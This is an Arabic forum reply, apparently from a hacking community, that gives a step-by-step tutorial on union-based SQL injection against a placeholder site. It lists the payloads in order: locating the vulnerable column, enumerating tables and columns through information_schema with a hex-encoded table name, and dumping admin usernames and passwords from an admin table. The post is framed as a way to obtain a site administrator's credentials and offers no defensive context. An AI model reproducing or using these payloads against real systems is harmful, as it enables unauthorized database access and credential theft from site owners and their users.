الموضوع: مشكلة في sql !!
عرض مشاركة واحدة
قديم 02-04-2011, 01:44 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
aircrack -ng
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي


شوف اخي نمشي خطوة خطوة

مثلا معانا موقع وكان اصدار قاعدة البيانات 5 وكان عدد الاعمدة 8
مثلا معنا هالموقع

كود:
http://xxxx.com/index.php?id=1+union+select+1,2,3,4,5,6,7,8--
مثلا العمود المصاب رقم 2

احنا بدنا نطلع الجداول وبالتحديد جدول اليوزر الي يطلعلنا بيانات الادمن


كود:
http://xxxx.com/index.php?id=1+union+select+1,group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
والان طلعت معانا جداول كثيرة

users:password:system

tab_admin:password:system

info:level:system

احنا نشوف مين فيهم يطلعلنا معلومات الادمن نحنا مثلا نشوف انو هاد راح يطلعلنا كل معلومات الادمن

tab_admin

احنا نفوت نشفرها بموقع التشفير

احنا شفرناها وكل شيء تمام

كود:
http://xxxx.com/index.php?id=1+union+select+1,group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7461625f61646d696e
الان طلع معانا معلومات كثير
id
username
password
email
وهيك
id=رقم العضوية
username=اسم الادمن

password=باس الادمن

يعني راح نعمل هيك


كود:
http://xxxx.com/index.php?id=1+union+select+1,group_concat(username,0x3a,id,0x3a,password),3,4,5,6,7,8+from+tab_admin
طيب الان طلعت معانا اليوزر والباس راح يكون هيك

مثلا اليوزر طلع admin
رقم العضوية 1
الباس 123456

اتمنى تكون وصلت الفكرة
التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس